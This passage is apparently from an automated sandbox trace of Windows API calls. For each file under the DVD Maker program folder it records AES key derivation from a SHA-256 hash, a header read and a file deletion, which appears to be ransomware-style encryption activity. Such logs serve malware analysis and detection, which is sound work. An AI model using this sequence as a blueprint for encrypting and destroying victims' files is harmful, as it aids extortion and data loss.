nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0142.426] CryptDestroyHash (hHash=0x284d528) returned 1 [0142.426] CryptDestroyKey (hKey=0x284d668) returned 1 [0142.426] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0142.428] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\full.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\full\\full.png")) returned 0 [0142.429] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0142.429] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0142.429] CryptHashData (hHash=0x284d5a8, pbData=0x9d1570, dwDataLen=0x100, dwFlags=0x0) returned 1 [0142.429] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d668) returned 1 [0142.430] GetFileSize (in: hFile=0x424, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x13e0 [0142.430] ReadFile (in: hFile=0x424, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0142.433] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0142.433] CryptDestroyKey (hKey=0x284d668) returned 1 [0142.433] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0142.434] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\NavigationLeft_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\full\\navigationleft_buttongraphic.png")) returned 0 [0142.470] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0142.471] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0142.471] CryptHashData (hHash=0x284d528, pbData=0x9d1570, dwDataLen=0x100, dwFlags=0x0) returned 1 [0142.471] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d668) returned 1 [0142.471] GetFileSize (in: hFile=0x428, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xc3a [0142.471] ReadFile (in: hFile=0x428, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0142.473] CryptDestroyHash (hHash=0x284d528) returned 1 [0142.473] CryptDestroyKey (hKey=0x284d668) returned 1 [0142.473] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0142.475] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\NavigationLeft_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\full\\navigationleft_selectionsubpicture.png")) returned 0 [0142.475] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0142.476] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0142.476] CryptHashData (hHash=0x284d5a8, pbData=0x9d1570, dwDataLen=0x100, dwFlags=0x0) returned 1 [0142.476] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d668) returned 1 [0142.476] GetFileSize (in: hFile=0x424, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x13a1 [0142.476] ReadFile (in: hFile=0x424, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0142.479] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0142.479] CryptDestroyKey (hKey=0x284d668) returned 1 [0142.479] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0142.480] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\NavigationRight_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\full\\navigationright_buttongraphic.png")) returned 0 [0142.495] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0142.496] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0142.496] CryptHashData (hHash=0x284d528, pbData=0x9d1570, dwDataLen=0x100, dwFlags=0x0) returned 1 [0142.496] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d668) returned 1 [0142.496] GetFileSize (in: hFile=0x428, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xc2e [0142.496] ReadFile (in: hFile=0x428, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0142.498] CryptDestroyHash (hHash=0x284d528) returned 1 [0142.498] CryptDestroyKey (hKey=0x284d668) returned 1 [0142.498] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0142.499] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\NavigationRight_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\full\\navigationright_selectionsubpicture.png")) returned 0 [0142.500] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0142.500] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0142.500] CryptHashData (hHash=0x284d5a8, pbData=0x9d1570, dwDataLen=0x100, dwFlags=0x0) returned 1 [0142.501] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d668) returned 1 [0142.501] GetFileSize (in: hFile=0x424, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x135b [0142.501] ReadFile (in: hFile=0x424, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0142.503] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0142.503] CryptDestroyKey (hKey=0x284d668) returned 1 [0142.503] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0142.505] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\NavigationUp_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\full\\navigationup_buttongraphic.png")) returned 0 [0142.506] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0142.506] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0142.506] CryptHashData (hHash=0x284d528, pbData=0x9d1570, dwDataLen=0x100, dwFlags=0x0) returned 1 [0142.506] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d668) returned 1 [0142.506] GetFileSize (in: hFile=0x428, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xc09 [0142.506] ReadFile (in: hFile=0x428, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0142.508] CryptDestroyHash (hHash=0x284d528) returned 1 [0142.508] CryptDestroyKey (hKey=0x284d668) returned 1 [0142.508] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0142.510] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\NavigationUp_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\full\\navigationup_selectionsubpicture.png")) returned 0 [0142.510] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0142.510] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0142.510] CryptHashData (hHash=0x284d5a8, pbData=0x9d1570, dwDataLen=0x100, dwFlags=0x0) returned 1 [0142.510] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d668) returned 1 [0142.510] GetFileSize (in: hFile=0x424, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xb92 [0142.510] ReadFile (in: hFile=0x424, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0142.512] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0142.512] CryptDestroyKey (hKey=0x284d668) returned 1 [0142.512] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0142.514] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\pushplaysubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\full\\pushplaysubpicture.png")) returned 0 [0142.515] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52568) returned 1 [0142.516] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0142.516] CryptHashData (hHash=0x284d568, pbData=0x9d1458, dwDataLen=0x100, dwFlags=0x0) returned 1 [0142.516] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d568, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d528) returned 1 [0142.516] GetFileSize (in: hFile=0x42c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x75ba [0142.516] ReadFile (in: hFile=0x42c, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0142.520] CryptDestroyHash (hHash=0x284d568) returned 1 [0142.520] CryptDestroyKey (hKey=0x284d528) returned 1 [0142.520] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0142.521] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Heart_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\heart_buttongraphic.png")) returned 0 [0142.521] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52568) returned 1 [0142.522] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0142.522] CryptHashData (hHash=0x284d668, pbData=0x9d1458, dwDataLen=0x100, dwFlags=0x0) returned 1 [0142.522] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d528) returned 1 [0142.522] GetFileSize (in: hFile=0x428, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x13d0 [0142.522] ReadFile (in: hFile=0x428, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0142.550] CryptDestroyHash (hHash=0x284d668) returned 1 [0142.550] CryptDestroyKey (hKey=0x284d528) returned 1 [0142.550] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0142.551] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\heart_glass_Thumbnail.bmp" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\heart_glass_thumbnail.bmp")) returned 0 [0142.551] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52568) returned 1 [0142.552] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0142.552] CryptHashData (hHash=0x284d568, pbData=0x9d1458, dwDataLen=0x100, dwFlags=0x0) returned 1 [0142.552] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d568, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d528) returned 1 [0142.552] GetFileSize (in: hFile=0x42c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x1278 [0142.552] ReadFile (in: hFile=0x42c, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0142.555] CryptDestroyHash (hHash=0x284d568) returned 1 [0142.555] CryptDestroyKey (hKey=0x284d528) returned 1 [0142.555] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0142.556] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Heart_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\heart_selectionsubpicture.png")) returned 0 [0142.556] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52568) returned 1 [0142.557] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0142.557] CryptHashData (hHash=0x284d668, pbData=0x9d1458, dwDataLen=0x100, dwFlags=0x0) returned 1 [0142.557] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d528) returned 1 [0142.557] GetFileSize (in: hFile=0x428, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x166e [0142.557] ReadFile (in: hFile=0x428, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0142.560] CryptDestroyHash (hHash=0x284d668) returned 1 [0142.560] CryptDestroyKey (hKey=0x284d528) returned 1 [0142.560] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0142.561] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Heart_VideoInset.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\heart_videoinset.png")) returned 0 [0142.563] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0142.563] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0142.564] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0142.564] CryptHashData (hHash=0x284d528, pbData=0x9d1570, dwDataLen=0x100, dwFlags=0x0) returned 1 [0142.564] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d668) returned 1 [0142.564] GetFileSize (in: hFile=0x428, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x11da [0142.564] ReadFile (in: hFile=0x428, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0142.566] CryptDestroyHash (hHash=0x284d528) returned 1 [0142.566] CryptDestroyKey (hKey=0x284d668) returned 1 [0142.566] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0142.567] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\1047x576black.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\huecycle\\1047x576black.png")) returned 0 [0142.568] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0142.569] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0142.569] CryptHashData (hHash=0x284d5a8, pbData=0x9d1570, dwDataLen=0x100, dwFlags=0x0) returned 1 [0142.569] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d668) returned 1 [0142.569] GetFileSize (in: hFile=0x424, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xb05 [0142.569] ReadFile (in: hFile=0x424, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0142.571] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0142.571] CryptDestroyKey (hKey=0x284d668) returned 1 [0142.571] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0142.572] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\15x15dot.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\huecycle\\15x15dot.png")) returned 0 [0142.573] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0142.573] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0142.573] CryptHashData (hHash=0x284d528, pbData=0x9d1570, dwDataLen=0x100, dwFlags=0x0) returned 1 [0142.573] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d668) returned 1 [0142.573] GetFileSize (in: hFile=0x428, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x43e2 [0142.573] ReadFile (in: hFile=0x428, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0142.577] CryptDestroyHash (hHash=0x284d528) returned 1 [0142.577] CryptDestroyKey (hKey=0x284d668) returned 1 [0142.577] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0142.582] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\colorcycle.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\huecycle\\colorcycle.png")) returned 0 [0142.583] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0142.583] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0142.583] CryptHashData (hHash=0x284d5a8, pbData=0x9d1570, dwDataLen=0x100, dwFlags=0x0) returned 1 [0142.583] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d668) returned 1 [0142.583] GetFileSize (in: hFile=0x424, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xb57 [0142.583] ReadFile (in: hFile=0x424, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0142.585] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0142.585] CryptDestroyKey (hKey=0x284d668) returned 1 [0142.585] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0142.586] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\huemainsubpicture2.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\huecycle\\huemainsubpicture2.png")) returned 0 [0142.587] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0142.587] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0142.587] CryptHashData (hHash=0x284d528, pbData=0x9d1570, dwDataLen=0x100, dwFlags=0x0) returned 1 [0142.587] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d668) returned 1 [0142.587] GetFileSize (in: hFile=0x428, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x13e0 [0142.587] ReadFile (in: hFile=0x428, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0142.590] CryptDestroyHash (hHash=0x284d528) returned 1 [0142.590] CryptDestroyKey (hKey=0x284d668) returned 1 [0142.590] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0142.591] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\NavigationLeft_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\huecycle\\navigationleft_buttongraphic.png")) returned 0 [0142.592] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0142.592] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0142.592] CryptHashData (hHash=0x284d5a8, pbData=0x9d1570, dwDataLen=0x100, dwFlags=0x0) returned 1 [0142.592] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d668) returned 1 [0142.592] GetFileSize (in: hFile=0x424, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xc3a [0142.592] ReadFile (in: hFile=0x424, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0142.595] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0142.595] CryptDestroyKey (hKey=0x284d668) returned 1 [0142.595] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0142.596] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\NavigationLeft_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\huecycle\\navigationleft_selectionsubpicture.png")) returned 0 [0142.596] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0142.597] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0142.597] CryptHashData (hHash=0x284d528, pbData=0x9d1570, dwDataLen=0x100, dwFlags=0x0) returned 1 [0142.597] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d668) returned 1 [0142.597] GetFileSize (in: hFile=0x428, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x13a1 [0142.597] ReadFile (in: hFile=0x428, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0142.599] CryptDestroyHash (hHash=0x284d528) returned 1 [0142.599] CryptDestroyKey (hKey=0x284d668) returned 1 [0142.600] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0142.601] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\NavigationRight_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\huecycle\\navigationright_buttongraphic.png")) returned 0 [0142.601] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0142.602] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, 